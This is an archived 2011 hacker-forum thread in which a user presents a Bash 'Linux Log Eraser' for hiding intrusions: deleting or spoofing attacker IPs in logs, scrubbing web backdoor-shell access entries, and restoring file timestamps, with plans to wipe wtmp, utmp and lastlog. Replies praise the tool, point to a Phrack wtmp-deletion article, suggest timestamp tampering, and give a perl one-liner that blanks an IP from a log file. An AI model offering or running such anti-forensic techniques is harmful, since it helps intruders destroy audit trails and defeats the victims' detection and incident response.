PDA

View Full Version : Project: Linux Log Eraser v0.1



b0nd
05-26-2011, 10:26 AM
Hi Friends,

I am working on the concept for couple of days and believe I've coded >50% of what I intended to automate. So posting the code and concept here to get more ideas, feedbacks and suggestions.

Q. Why another Log Wiper when already there are many?
Ans: Just for fun! The most effective ones are already there and have been coded in 'C'. I am just playing with BASH to learn it more. Moreover the existing log wipers coded in BASH, which I could find over net, are not good enough.

Ok, the following are the features I've already implemented:
1. Delete a particular IP from log files
2. Spoof a particular IP in log files
3. Delete the log entries for the web back door shell from web logs e.g. the case when you first access your web back door and then initiates a back connect shell from it.
4. Restore the time stamping for all the log files which have been accessed and edited. ctime sucks ;)
5. Get some basic system info
6. Verify-IP: To inform user if by mistake he has entered invalid IP (It includes 3 different checks on user input)
7. Exit feature from almost every part of code. Can not perform Ctrl + C as that would kill the shell itself

Pending features and issues:
1. Erase user activity logs from logs files (wtmp, utmp, lastlog etc). lastlog sucks ;)
2. Stop logging feature
3. Implement a "smart" function which would take input from a text file and proceed without user interaction
4. May be a feature that would crawl whole system to find back door shells uploaded by other attackers
5. Dunno the way to restore time stamping for ctime. It gets modified whenever there is some change in inode entry etc. of file or if the file itself has been edited.
6. May be some features to let user know the different kind of security tools implemented on server e.g. IPtables, SElinux, AV etc.
7. ...............

Lot of scaffolding is there as I am still working on it.

Feel free to play with the script, it won't harm your machine as you can 'exit' from it anytime.
Please post some ideas, suggestions, feedbacks... and if free enough, then chip in to work together as 1+1=11



Rgds

PS: Delete the trailing .txt extension.

"vinnu"
05-26-2011, 10:37 AM
Will be pretty helpful bhai. This code is definately going to help all of us..."vinnu"

abhaythehero
05-26-2011, 11:12 AM
That is superb ! I am learning bash and this is very helpful.
Would love to contribute to the code. Will post here if I can find some suggestions. :)

the_empty
05-26-2011, 11:16 AM
+1 to vinnu.

One most important thing which I have almost always observed in B0nd's codes is that those are really well managed and with proper documentation. Even we read the code after years of its development, there will be no question marks. Your my inspiration B0nd.... thanks alot

prashant_uniyal
05-26-2011, 11:33 AM
+100000000000 to vinnu bro and the_empty ;)

64

Its working fine. Just missing some of your own mentioned pending features. Will also try to edit it on my own once I get handy with bash scripting :) Thanks for the wonderful idea ! Cheers !! ;)

s1ayer
05-26-2011, 11:57 AM
kewl bro....... one thing... for ctime.. entry..... i dont know but.... we can avoid change in ctime, atime and mtime by modifying default system time.... as all time stamp updation is done by taking the system time only (not sure.....)

b0nd
05-26-2011, 12:04 PM
kewl bro....... one thing... for ctime.. entry..... i dont know but.... we can avoid change in ctime, atime and mtime by modifying default system time.... as all time stamp updation is done by taking the system time only (not sure.....)

Thanks for the suggestion s1ayer. Yes surely that can be done but should not be as there could be many cron jobs and other time dependent activities running on server.

@abhay, in that case chip in fast :)
@the_empty, yeah I am in good practice of documenting the code else I forget the flow easily

s1ayer
05-26-2011, 01:30 PM
hello bro,
If u just want to change the inode entry then i guess it can be done thru kernel tweaking.... i read somewhere in ma college..

:P got the result in first search only ........
two ways of doing first: touch second changing the block
http://www.linuxquestions.org/questions/linux-security-4/can-we-change-entries-in-the-inode-table-of-a-file-linux-881578/

http://linux.die.net/man/1/touch
:) still to test it....

for windows:
http://www.techrepublic.com/article/build-your-skills-learn-to-manipulate-file-time-stamps-in-windows/5034280

abhaythehero
05-26-2011, 02:59 PM
1. Erase user activity logs from logs files (wtmp, utmp, lastlog etc).
apologies for the script kiddie attitude :D
but this one rocks http://www.phrack.org/issues.html?issue=25&id=6#article
Tried and tested.Deletes records from from wtmp file.

s1ayer
05-26-2011, 03:41 PM
^^ nice.......
But we can do that in one line also
perl -e "s/192.168.1.1/ /g;" -pi logfilename
;) Its all about doing one thing in different ways......


cheers

fb1h2s
05-26-2011, 04:09 PM
something I really wanted these days thanks b0nd, taste better when its build under garage roof :)

neo
05-26-2011, 04:12 PM
Abhay you are missing the point completely

As bond said there are lots of Log Earasers already in Net.
He is doing it for practicing the Bash Scriping.
My suggestion for helping him would be , you also contribue with some code if you want to :)

Godwin Austin
05-26-2011, 05:42 PM
Nicely coded up ... Best thing is that its a shell script.
The code flow is nice. Well documented and comments are precise.
Something I should bring in practice. :)

Will see if I have any ideas about it and try to chip in.

abhaythehero
05-26-2011, 07:35 PM
Abhay you are missing the point completely

As bond said there are lots of Log Earasers already in Net.
He is doing it for practicing the Bash Scriping.
My suggestion for helping him would be , you also contribue with some code if you want to :)

Yes that is exactly what i wanted to .Actually I am just starting to get the hang of Linux security mechanisms.Will take some time :)
Yups, you are right , from now on will contribute my own codes only :cool:

s1ayer
06-01-2011, 06:32 PM
Hi bro,

I have tried to code for shell search in any linux/unix system... well I dont know shell scripting... so whole code is not mine it is of google..................
Just give a look to it once... if u want any changes... just let me know.....

search string: Hard coded... i think its shell .... so it better be hard coded... since i dont know best search querry for any shell...... so just gave some random strings... u can modify them.........
This program is slow :/.......... In future I will try to optimize it more.

Hackuin
06-02-2011, 05:54 PM
@slayer:

1. You have commented the line, which reads "# kindly ensure you have root access", Please try to display it either with "printf" or "echo" to end user. You should echo the message to user instead of displaying it at comments.

or Force user to be a root with:


#!/bin/bash
#: Description: Forcing user to be a root or Displaying the message to end-users to become root.

__rootUid=0 #: As we know the user ID of root is 0

if [ "$UID" -ne "$__rootUid" ] #: Please use desired STDOUT message for end-user.
then
printf "%s\n" "Cannot run script: Permission denied." "Please be root to use this script".
exit 1
fi


2. Please try build it with STDIN functionality.

@b0nd:
Script is very good.
I would also ask you too for forcing user to be a root. which leave us with few lesser coding. I mean, the whole processing/identification of who the user is and all, also helpful as, the distributions like, Fedora, OpenSuse etc., have only 'root' read access (-rw-------) to certain files like, "wtmp", and also, by default configuration of "ubuntu" you won't find, /var/log/messages, obviously your scripts looks for the files mentioned in the array. However, It would have been simply put of with "ls -R /var/log/*", for displaying log files available at his/her distribution. and also can use "grep Permi to just display user, which files he doesn't have access to aswell.

I need little more time to simple go through your complete script, I did not even run this yet. Just few points.

s1ayer
06-02-2011, 06:01 PM
@Hackuin

thnks for the suggestion bro....... will implement it.........

b0nd
06-03-2011, 02:22 PM
Hackuin, thanks for the valuable comments. Better don't read the script in detail at the moment bcoz I have designed it again from scratch and would be posting here soon. Let's have discussion after that.

s1ayer, thanks to you too for your inputs. I'll work on that as well.

Rgds